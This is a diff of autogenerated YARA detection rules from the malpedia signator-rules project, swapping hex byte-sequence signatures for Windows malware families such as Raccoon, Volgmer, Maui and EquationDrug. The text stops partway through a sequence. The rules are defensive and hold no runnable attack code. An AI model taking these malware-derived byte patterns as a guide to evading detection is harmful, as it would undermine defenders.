description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "379cd9d3-d698-58d1-90c1-aa0d12f74cc4" + id = "409a50f2-d1ad-54e1-a200-e21294aa9e4e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vobfus_auto.yar#L1-L221" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gibberish_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "87942ff8c467cfeb6529bdba1fb2a14574a28472aae2c0f0acabf5e6455fc919" + logic_hash = "57f29d590beea21c748ae9324417e51d5ad871133bb0f66df9972b1b6e5d5d7b" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -171086,45 +173893,32 @@ rule MALPEDIA_Win_Vobfus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b5508 8b92e8000000 8b82841d0000 50 50 8b10 } - $sequence_1 = { 8b5508 8b92e8000000 8b825c1e0000 50 } - $sequence_2 = { 8bec 8b5508 8b92e8000000 8b82c8150000 } - $sequence_3 = { 8b8220000000 50 50 8b10 ff5204 58 } - $sequence_4 = { 8b5508 8b92e8000000 8b8200080000 50 } - $sequence_5 = { 8b5508 8b92e8000000 8b82b4230000 50 } - $sequence_6 = { 8b5508 8b92e8000000 8b82d0130000 50 } - $sequence_7 = { 8b5508 8b92e8000000 8b829c0e0000 50 } - $sequence_8 = { f3ed ebf2 ed ec } - $sequence_9 = { ec f2ed ec f2ed ec f3ed } - $sequence_10 = { f2e8fae6d5f6 d2b5f2bb8ff3 ae 73f3 aa 5c f6ac4ff8b54ffb } - $sequence_11 = { 801800 0808 0006 3401 41 06 } - $sequence_12 = { 7cc8 dc7acd e291 d2e8 } - $sequence_13 = { 8631 96 0a7f25 7a43 92 9afc9e5780451f } - $sequence_14 = { 0c38 a95bedb2e5 759e 3a9b423ceb9d 65be2dafffcd 3624e4 6bee88 } - $sequence_15 = { 4b ce 8ca4b11e13b793 73aa fa } - $sequence_16 = { 48 0008 78ff 0d50004900 3e3cff 46 } - $sequence_17 = { 5c f6ac4ff8b54ffb c058fcca 61 } - $sequence_18 = { 46 14ff 0470 fe0a } - $sequence_19 = { e752 47 625403a7 78f5 06 95 } - $sequence_20 = { 6c 74ff 801800 0808 } - $sequence_21 = { b909dfd18c 9d 7454 2bcd 8ab411746337ed 80ab931e2e5e88 } - $sequence_22 = { c8ed9459 ef 60 226aa3 60 8907 6bdd97 } + $sequence_0 = { ff15???????? 8945a4 e8???????? 8b4dac 8b45a4 6a41 } + $sequence_1 = { 8b75e8 8b7dec e9???????? f30f7e4de8 0f1045d8 eb03 } + $sequence_2 = { c1e908 894c2410 8b4c2418 3314c5e1a14700 0fb6c1 c1e908 } + $sequence_3 = { e8???????? 84c0 0f849a000000 33c0 668985dcf9ffff 8d85e8fbffff 68???????? } + $sequence_4 = { 8944243c 8b4124 89442440 8b4128 8d4c241c c744241c209d4500 c7442420d49d4500 } + $sequence_5 = { 894db0 8d4dc0 50 c745d000000000 c745d40f000000 c645c000 e8???????? } + $sequence_6 = { 81fae3000000 7cc4 81fa6f020000 7d3a 57 8d3c9518bd4700 } + $sequence_7 = { 68???????? 53 53 ff15???????? 8b55ac 8b4da8 890491 } + $sequence_8 = { ff15???????? 66898435fdfbffff 83c607 53 56 8d85f8fbffff 50 } + $sequence_9 = { 8b45d4 8d4dd8 8b55d0 83ff10 8b7dd8 0f43cf 2bc2 } condition: - 7 of them and filesize <409600 + 7 of them and filesize <1068032 } -rule MALPEDIA_Win_Crosswalk_Auto : FILE +rule MALPEDIA_Win_Paladin_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4e86aa0a-7e26-5d10-b3ce-967831f39ceb" + id = "8e8ee0fc-daaf-5adf-960f-9f0ec8622d0d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crosswalk_auto.yar#L1-L164" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.paladin_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "c5472d51b6e367a8e5153b183b7c173cc8cbe07eef42b7b5523d361aefdeb08e" + logic_hash = "421e228bfdffaff271db99688d25ef5b69f4b46e3f813d9e9b328d48850dca52" score = 75 quality = 75 tags = "FILE" @@ -171138,38 +173932,32 @@ rule MALPEDIA_Win_Crosswalk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4885c9 7402 ffd1 b801000000 } - $sequence_1 = { ff15???????? 448bf0 4533c9 4533c0 } - $sequence_2 = { 458bc6 33d2 488bc8 e8???????? 4533c9 } - $sequence_3 = { 458d7ee0 418bd7 ff15???????? 4821742420 } - $sequence_4 = { 4c8bc6 33d2 410fbe00 49ffc0 } - $sequence_5 = { 418bc0 f7e9 03d1 c1fa0b 8bc2 c1e81f 03d0 } - $sequence_6 = { d3ca 03d0 4183ef01 75ef } - $sequence_7 = { 410fbe00 49ffc0 d3ca 03d0 } - $sequence_8 = { 8b45fc 817848f0844100 7409 ff7048 e8???????? } - $sequence_9 = { 6a26 58 0fb60c85c6574100 0fb63485c7574100 8bf9 } - $sequence_10 = { 7403 ff5508 5d c20400 53 8b1d???????? } - $sequence_11 = { 735f 8bc6 8bfe 83e03f c1ff06 6bd830 8b04bd808e4100 } - $sequence_12 = { c1f906 03048d808e4100 eb02 8bc6 80782900 } - $sequence_13 = { 83e801 0f8501010000 c745e0245b4100 8b4508 8bcf 8b7510 } - $sequence_14 = { 740e 50 e8???????? 83a6808e410000 59 } - $sequence_15 = { 83e801 0f8580000000 8b4508 dd00 ebc6 c745e0285b4100 e9???????? } + $sequence_0 = { c20800 8d5d04 50 52 } + $sequence_1 = { ffd7 8b4614 6aff 50 ffd7 8b4e10 } + $sequence_2 = { 0faff0 83c61f c70728000000 c1fe03 83e6fc 894704 0faff1 } + $sequence_3 = { 53 55 56 8bf1 57 b918000000 33c0 } + $sequence_4 = { 33c0 8a41ff 8d1440 8d1492 8d1492 8d1cd0 33d2 } + $sequence_5 = { 687f030000 6a00 68???????? 8bf0 } + $sequence_6 = { 33c0 8dbc24a0000000 33d2 899c249c000000 83c40c 89942484000000 f3ab } + $sequence_7 = { 81c468020000 c20400 53 c645002e bb01000000 eb04 8b742414 } + $sequence_8 = { 8b4518 83f804 7427 83f802 7422 83f806 741d } + $sequence_9 = { 83f80d 0f8661010000 eb04 8b6c2410 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Unidentified_044_Auto : FILE +rule MALPEDIA_Win_Equationdrug_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a037a55a-a1d2-5696-aa65-bcad92ff6480" + id = "37b1b451-51c5-5fbc-9487-21d701b707d2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_044_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.equationdrug_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "fa0bbb48e3a00969b6207e7af2c24fceeabe6227dd53aafea6a4369ea97af4c2" + logic_hash = "f8f538888e4dbac5fbcd6d58b6a95043a330081a5194049d400ba3c70341afe9" score = 75 quality = 75 tags = "FILE" @@ -171183,32 +173971,32 @@ rule MALPEDIA_Win_Unidentified_044_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bca 8bd8 e8???????? 83c404 84c0 7409 668b542408 } - $sequence_1 = { 3bcf 7416 8d9b00000000 80792400 7403 } - $sequence_2 = { c3 8b8424e4020000 6a10 6a00 50 } - $sequence_3 = { 74b3 33ff 397c2418 76ab 33c0 } - $sequence_4 = { ff15???????? 3d1e270000 7552 8b442408 85c0 } - $sequence_5 = { 2bf0 03d8 85f6 7fe2 } - $sequence_6 = { 803e00 8be8 743f 53 57 } - $sequence_7 = { ffd5 8bb42464050000 85c0 7f85 7c24 f644242420 0f8468feffff } - $sequence_8 = { c7460403000000 ffd3 5b 5f 32c0 5e } - $sequence_9 = { 55 e8???????? 83c40c 84c0 74a0 8a442413 } + $sequence_0 = { 5b c21000 8bd0 56 81e2ff0f0000 53 83c704 } + $sequence_1 = { 0f84f4000000 8b7c2414 f7c7ff010000 0f85e4000000 8b4e04 8d442410 50 } + $sequence_2 = { 56 8d4c2418 c644245800 e8???????? 8d4c2414 e8???????? 84c0 } + $sequence_3 = { 84c0 741a 668b4ef8 660fbed0 668b46fa 52 50 } + $sequence_4 = { 89542414 8b542410 0fbfc2 40 0fafc1 3bfb 73c4 } + $sequence_5 = { c644245c00 e8???????? 83c404 89442464 85c0 c644245802 7411 } + $sequence_6 = { e8???????? 85c0 0f864b020000 53 8bcd e8???????? 50 } + $sequence_7 = { 33c0 eb07 8b4708 2bc6 d1f8 33d2 33db } + $sequence_8 = { 8bca b001 83e103 f3a4 5f 5e 5d } + $sequence_9 = { 6685c0 7537 8b442408 3dffff0000 772c c1e009 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <449536 } -rule MALPEDIA_Win_Appleseed_Auto : FILE +rule MALPEDIA_Win_Wmighost_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5111027d-aef3-530a-baef-816a96e705d5" + id = "0b0db58b-a86c-5fcd-a072-2eb1cc17420a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.appleseed_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wmighost_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "a810d449fba9d18767008ae79deb61edb7dc0a7b0fedfb1cf50aff52e06540b9" + logic_hash = "ca34789fba1f2bd4e0c465ce04013e3b6750b48b70cd8c7936238cd0c587d01a" score = 75 quality = 75 tags = "FILE" @@ -171222,32 +174010,32 @@ rule MALPEDIA_Win_Appleseed_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 448bc6 442bc0 488b442450 488d0d65d30100 488b0cc1 4c8d4c244c 488d9520060000 } - $sequence_1 = { 4c89b590000000 c6858000000000 4883bde000000010 720c 488b8dc8000000 e8???????? 8bc7 } - $sequence_2 = { 90 488d4db8 e8???????? 48833d????????00 0f84b10c0000 } - $sequence_3 = { 488bcb ff15???????? ff15???????? 33ff 8bf0 0f1f8000000000 ff15???????? } - $sequence_4 = { 90 488d4db8 e8???????? 48833d????????00 0f84c0040000 488d157e170200 488d4db8 } - $sequence_5 = { 488bce ff15???????? 4885c0 7411 83caff 488bc8 } - $sequence_6 = { e9???????? 488d8af0000000 e9???????? 488b8a60000000 e9???????? 488d8a10010000 e9???????? } - $sequence_7 = { 0f8490000000 85db 0f8488000000 41880f 4b8b84e900670300 4183caff 4103da } - $sequence_8 = { 48ffc7 803c3a00 75f7 488d4c2450 4c8bc7 e8???????? 488d4c2450 } - $sequence_9 = { 48895dc8 c645b800 41b838000000 488d15b81d0200 488d4db8 e8???????? 90 } + $sequence_0 = { 52 e8???????? 83c40c 68e8030000 ff15???????? e9???????? } + $sequence_1 = { 83c408 68???????? 8d8df0fcffff 51 } + $sequence_2 = { c745fc00000000 8d4d08 e8???????? 50 8b45e8 8b08 } + $sequence_3 = { 8945fc 837dfcff 7505 e9???????? 6a02 } + $sequence_4 = { 8b550c 52 8d85f0fcffff 50 e8???????? 83c408 } + $sequence_5 = { 33c1 8b55f8 8882c8304000 8b45f8 0fbe88c8304000 33d2 8a15???????? } + $sequence_6 = { 66ab aa c685f0fcffff00 b940000000 33c0 8dbdf1fcffff } + $sequence_7 = { 50 8b4df0 51 e8???????? c745fcffffffff 8d4d08 e8???????? } + $sequence_8 = { 8dbdfdfeffff f3ab 66ab aa c685f0fcffff00 b940000000 } + $sequence_9 = { 8955e4 8b45ec 50 8b4de4 51 6aff } condition: - 7 of them and filesize <497664 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Tinytyphon_Auto : FILE +rule MALPEDIA_Win_Thumbthief_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7815c923-a900-5d01-9a5b-05c1d0e30118" + id = "37aaa405-1531-5214-b674-b08465e47533" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinytyphon_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thumbthief_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e057b3aaf1408e310c88894f8b7bb86876f0ba7268b4daf2dcf5c0bb823f13c5" + logic_hash = "f526be6ecad90c989de9ad949776796071b33db6ed80435843c6bf3aac7a3492" score = 75 quality = 75 tags = "FILE" @@ -171261,32 +174049,32 @@ rule MALPEDIA_Win_Tinytyphon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c745b430144000 c745b834144000 c745bc38144000 c745c03c144000 c745c440144000 } - $sequence_1 = { 50 8b0d???????? 51 e8???????? 83c420 8b955cffffff 52 } - $sequence_2 = { 68???????? 8d85e8feffff 50 ff15???????? 8d8dccfdffff 51 } - $sequence_3 = { 034df4 034df0 894dd4 8b5508 } - $sequence_4 = { 034df8 0fbe11 85d2 0f84fe010000 8b4508 0345f8 } - $sequence_5 = { 0345c0 8a08 880a ebdf 8d55d8 52 } - $sequence_6 = { eba9 68a01f0000 ff15???????? 6a0f 8d8df0feffff 51 } - $sequence_7 = { 034a58 8b45f8 8d8c0878a46ad7 894df8 8b55f8 c1e207 8b45f8 } - $sequence_8 = { 83bde4feffffff 750a c785e4feffff00000000 83bde4feffff00 7505 } - $sequence_9 = { 52 8d85f0feffff 50 8d8dd0fdffff } + $sequence_0 = { e9???????? 689c000000 b8???????? e8???????? 33db 8d4db4 895dec } + $sequence_1 = { f6431002 0f85e1000000 85f6 0f44f3 89758c b800040000 66854310 } + $sequence_2 = { ffb58cfeffff 8d8d30ffffff e8???????? 8d8de0feffff 807def00 7408 ffb5acfeffff } + $sequence_3 = { f20f1085ecfeffff 8d8574ffffff 51 51 f20f110424 50 8d85f4feffff } + $sequence_4 = { e8???????? c645fc02 8d8d58ffffff e8???????? c645fc03 8d8d18ffffff e8???????? } + $sequence_5 = { bf48030000 8d85a4fcffff 57 6a00 50 e8???????? 83c40c } + $sequence_6 = { eb77 68???????? eb70 68???????? eb69 8bc3 2d04130400 } + $sequence_7 = { ff75f8 85c0 743c ff75f4 ba07000000 8bcf e8???????? } + $sequence_8 = { e8???????? b8???????? e9???????? 8d4ddc e9???????? 8d4dbc e9???????? } + $sequence_9 = { ff15???????? 8b4704 5f 85c0 740a 894508 5d } condition: - 7 of them and filesize <90112 + 7 of them and filesize <4235264 } -rule MALPEDIA_Win_Raccoon_Auto : FILE +rule MALPEDIA_Win_Moure_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4a27386e-afe9-5aa0-b437-cb8672f32902" + id = "d5ea53f7-d6a1-5284-9152-98034607f388" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.raccoon_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moure_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "744c135940d1e7204980afbdf51c2b964c1deff72c5358a0844976025962517f" + logic_hash = "e394b210e6ac1eaa6569608ddb349d4dd1ae50231f20d0924074c460f1fa6782" score = 75 quality = 75 tags = "FILE" @@ -171300,32 +174088,32 @@ rule MALPEDIA_Win_Raccoon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf0 8975f0 85f6 7422 8d45ec c706???????? } - $sequence_1 = { e8???????? 68???????? eb31 51 } - $sequence_2 = { 8b45e8 3bc6 7c31 7f04 3bde 762b } - $sequence_3 = { 53 50 8d45e0 895dd0 } - $sequence_4 = { ff15???????? 8945f4 40 03c7 50 8945f0 } - $sequence_5 = { ff15???????? 8bf0 83feff 7437 837b1410 7202 8b1b } - $sequence_6 = { 8d45ec c706???????? 50 53 ff75e4 895dec ff15???????? } - $sequence_7 = { 57 33db 8bf9 53 6aff 53 } - $sequence_8 = { 6a01 52 52 52 52 } - $sequence_9 = { 0f85dd000000 57 57 57 57 8d45fc } + $sequence_0 = { 3454 43 1558c950cb 0d487b0d4c 36a373801f1e } + $sequence_1 = { bf55602540 006b05 bc7d506700 0033 58 bf35b8bf55 58 } + $sequence_2 = { 8b35???????? 57 00d6 0075f0 894508 0075fc 00d6 } + $sequence_3 = { 51 51 8b0d???????? 56 33f6 85c9 7509 } + $sequence_4 = { 837dbc00 7436 0075bc 8d4ddc e8???????? a1???????? 3bc6 } + $sequence_5 = { 82a8a200b000c1 8b00 e100 9e d28bd3977e8d 98 } + $sequence_6 = { 68b0704000 007014 007010 e8???????? } + $sequence_7 = { 5e 53 43 c1c361 5b c9 51 } + $sequence_8 = { 8b01 83e03f 3c02 751c 8b4514 8b10 83e23f } + $sequence_9 = { 42 c3 874226 c58035b4fe70 5e } condition: - 7 of them and filesize <1212416 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Shujin_Auto : FILE +rule MALPEDIA_Win_Beatdrop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "20683034-d09a-5705-9d80-d7edf3a7d88d" + id = "b3142cf9-1fa2-58bd-9f49-d91bf2cf24b1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shujin_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.beatdrop_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "b1da2f105214e6f844dccb186e5a1748a5be3983c376113a3f54dc8e70f99c20" + logic_hash = "171eb025ab1384be132ed16b4793a3dd033a6c86c2974208fbbb41bec30e49af" score = 75 quality = 75 tags = "FILE" @@ -171339,34 +174127,34 @@ rule MALPEDIA_Win_Shujin_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? ff7660 8b1d???????? 6a01 bf80000000 57 } - $sequence_1 = { ff15???????? 85c0 0f8431010000 53 897df4 } - $sequence_2 = { 6aff 50 ff15???????? 57 8b7d10 83ff01 } - $sequence_3 = { 8bf9 ba???????? 0fb67201 8a0a 8b1f d3e3 0fb60c06 } - $sequence_4 = { 83615400 53 56 57 8d7108 c7450805000000 8b46f8 } - $sequence_5 = { ff45f8 817df870170000 72c9 e9???????? 807daa01 8b45e8 8d1c06 } - $sequence_6 = { 8b5508 0facc21a c1f81a 8bd8 8955e4 } - $sequence_7 = { c1ef10 8d8d9cf9ffff 2bf9 03f8 a0???????? a801 7421 } - $sequence_8 = { 895008 8b680c 8bd5 896c2410 } - $sequence_9 = { 8d1c06 83c40c 8975f8 3bf3 731e } + $sequence_0 = { e8???????? 4c89f1 e8???????? 4c8d0571aaffff } + $sequence_1 = { 4733bc84000c0000 4189c1 4589f0 41c1e918 4433bebc000000 41c1e810 } + $sequence_2 = { 0fb6c0 413394b5000c0000 c1eb18 33552c 4133948500040000 4489c0 } + $sequence_3 = { 4189d3 0fb6ce 41c1e818 41c1eb18 478b4c8500 4589f8 438b5c9d00 } + $sequence_4 = { 4189d3 c1ea18 41c1eb10 335e78 418b1494 4333948c000c0000 450fb6db } + $sequence_5 = { 4489cb 334610 41c1eb18 450fb6d2 0fb6df 4333849400040000 } + $sequence_6 = { 41c1e818 4189cf 4489d1 478b0484 4733848c000c0000 4589d1 } + $sequence_7 = { 488b3d???????? 89d8 4989ce 4989d5 488b0d???????? 4c89c6 4c89cd } + $sequence_8 = { 498344241010 eb11 498d4c2408 e8???????? eb05 49ff442418 } + $sequence_9 = { e8???????? 4885c0 752c 4c8b4b08 41b813000000 } condition: - 7 of them and filesize <172032 + 7 of them and filesize <584704 } -rule MALPEDIA_Win_Dadjoke_Auto : FILE +rule MALPEDIA_Win_Maui_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "62c26982-fdfa-5ead-84fa-82086121c261" + id = "3b08a716-7f90-5bcd-af98-705f5527c8fd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dadjoke_auto.yar#L1-L224" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maui" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maui_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "551e5b1afd2fb8a5c55119844d05872b1d6fb1f0561b620ba9bad0b2cb1592e0" + logic_hash = "da972ed3bba518a07c1d6cad703f6be4a891f59859651a81726f8cacb62eabef" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -171378,46 +174166,34 @@ rule MALPEDIA_Win_Dadjoke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 57 6800081000 6a00 } - $sequence_1 = { 8b55bc 52 6800040000 8d8518f5ffff 50 e8???????? } - $sequence_2 = { 3d46270000 7406 837dd800 752c } - $sequence_3 = { 8345bc01 807df600 75ed 8b7dbc 8bb570ffffff 8b956cffffff } - $sequence_4 = { 6a00 6a00 ff15???????? 8945c0 6a00 6a01 } - $sequence_5 = { ff15???????? 8945fc 8b4dfc 51 e8???????? 83c404 } - $sequence_6 = { e8???????? 83c40c 8d8d28fdffff 51 e8???????? 83c404 } - $sequence_7 = { 5e c3 8bff 55 8bec 83ec10 33c0 } - $sequence_8 = { ff15???????? 85c0 7417 b920000000 } - $sequence_9 = { e8???????? c3 6a04 e8???????? 59 c3 6a0c } - $sequence_10 = { 84c0 0f94c1 8bc1 c3 a1???????? c3 8bff } - $sequence_11 = { e8???????? 83c40c c7458c00000000 ff15???????? 50 e8???????? } - $sequence_12 = { 8b3d???????? 8b1d???????? 51 e8???????? 8bf0 83c404 } - $sequence_13 = { 6a40 6800100000 6800004000 6a00 } - $sequence_14 = { 0f84d5480000 c3 833d????????ff 7503 33c0 } - $sequence_15 = { 7ce7 8d45f4 c645f800 33db 8d7001 33d2 } - $sequence_16 = { 8b85e4faffff 8d95e0faffff 52 68???????? 50 8b08 } - $sequence_17 = { 8d85e4faffff 50 68???????? 6a01 6a00 68???????? ff15???????? } - $sequence_18 = { 884435f4 46 83fe04 7ce7 8d45f4 c645f800 } - $sequence_19 = { c745fc14000000 0f1106 894610 8d45fc } - $sequence_20 = { 5f 0f44ca 5b 8bc1 5e 5d c3 } - $sequence_21 = { 83e13f c1f806 6bc930 8b048558047500 } + $sequence_0 = { 8b1b 895c2410 a810 0f841a010000 57 51 25c0000000 } + $sequence_1 = { 83c40c 85c0 7515 53 e8???????? 57 e8???????? } + $sequence_2 = { 83c404 5f 5b 5e 5d c3 8bce } + $sequence_3 = { c1e010 094610 0fb64101 41 99 0fa4c208 095614 } + $sequence_4 = { e8???????? 83c408 85c0 0f846b010000 3b5d20 8d4518 7e0a } + $sequence_5 = { 85c0 750a 68d0010000 e9???????? 8b542438 8b02 56 } + $sequence_6 = { e8???????? 83c40c 85c0 0f849b010000 8d442428 57 50 } + $sequence_7 = { 8bac24a4000000 f7463c00010000 753a 8b4628 8b10 89542460 8b5004 } + $sequence_8 = { 50 50 50 50 e8???????? 83c414 ff33 } + $sequence_9 = { e8???????? 53 89442438 8907 e8???????? 53 89442460 } condition: - 7 of them and filesize <344064 + 7 of them and filesize <1616896 } -rule MALPEDIA_Win_Volgmer_Auto : FILE +rule MALPEDIA_Win_Romeos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6318a069-35e9-5ac9-b46b-f601ef58e4f8" + id = "0156645c-05e4-5c43-9143-7d272fa7b808" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.volgmer_auto.yar#L1-L360" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.romeos_auto.yar#L1-L178" license_url = "N/A" - logic_hash = "f927338edc5a7e32548016c88c35f08a0b0dddf5ae3c9ab69c63c8695ae3cd83" + logic_hash = "c5549ec98f2ed02ef2ebca3bfe2dbd57b9e8c34679be2e9e834dd93b596fc1fe" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -171429,61 +174205,40 @@ rule MALPEDIA_Win_Volgmer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b4d40 4833cc e8???????? 4c8d9c2450010000 498b5b18 498b7b20 498be3 } - $sequence_1 = { 48897c2418 55 488d6c24b0 4881ec50010000 488b05???????? 4833c4 48894540 } - $sequence_2 = { e8???????? 488b4dc3 41890424 e8???????? } - $sequence_3 = { d1c6 c1c105 03c6 89742404 03c3 } - $sequence_4 = { ff15???????? 4885c0 740f 488b4018 488b08 8b01 8905???????? } - $sequence_5 = { 8b45b0 488d8dc00f0000 4533c9 4889742430 89442428 ba00000080 c744242003000000 } - $sequence_6 = { e8???????? 488bd8 eb03 488bdf 488d056efeffff } - $sequence_7 = { 75e9 488d8d90140000 48ffc9 40387101 488d4901 75f6 4c8b45a0 } - $sequence_8 = { c6843de011000000 488d8de0110000 e8???????? 488b4c2440 488d95e0110000 ff15???????? 0fb63d???????? } - $sequence_9 = { 488d4d60 41b808040000 8bf8 e8???????? ba32d00200 b940000000 ff55e0 } - $sequence_10 = { e8???????? 488d8dd2050000 33d2 41b806020000 6689bdd0050000 e8???????? } - $sequence_11 = { ff15???????? 85c0 7507 b800000100 eb26 } - $sequence_12 = { e8???????? e8???????? e8???????? e8???????? c705????????04000000 } - $sequence_13 = { e8???????? 85c0 7466 33d2 488d8c24e4000000 41b804040000 e8???????? } - $sequence_14 = { 8bd6 c68435000a000000 488d8d000a0000 e8???????? 488d95000a0000 498bce ff15???????? } - $sequence_15 = { eb17 894638 eb0e c74634047b7300 c7463806000000 } - $sequence_16 = { 8a07 8b0c9580f16e00 8844192e 8b049580f16e00 804c182d04 } - $sequence_17 = { 8b4504 8b4d0c 6a00 52 } - $sequence_18 = { 8b048dd4926d00 ffe0 f7c703000000 7413 8a06 8807 } - $sequence_19 = { e9???????? c745dc02000000 c745e0e4ba7300 8b4508 8bcf } - $sequence_20 = { 83c408 85f6 0f84b7010000 8bce 8d85d0fdffff } - $sequence_21 = { 03048d80f16e00 50 ff15???????? 5d c3 8bff } - $sequence_22 = { 50 68???????? ff7708 ff95e4f3ffff 817f1400008000 89470c 751c } - $sequence_23 = { 5f 5e c684101803000000 5b } - $sequence_24 = { 8a4c2428 8d442428 3acb 741a } - $sequence_25 = { 40 c745ecb8996d00 894df8 8945fc 64a100000000 8945e8 8d45e8 } - $sequence_26 = { 50 52 56 6a00 68e9fd0000 ff95e8f3ffff ff7714 } - $sequence_27 = { 50 51 53 53 6800000008 } - $sequence_28 = { ff15???????? 8d442408 50 ff15???????? 85c0 5f 740c } - $sequence_29 = { ba???????? 2bd1 668b0c02 6685c9 } - $sequence_30 = { c745dc03000000 c745e0e0ba6e00 e9???????? 83e80f 7451 } - $sequence_31 = { 33d2 05d9e7ffff 56 83f815 0f8711010000 ff2485786b6d00 51 } - $sequence_32 = { 8a01 41 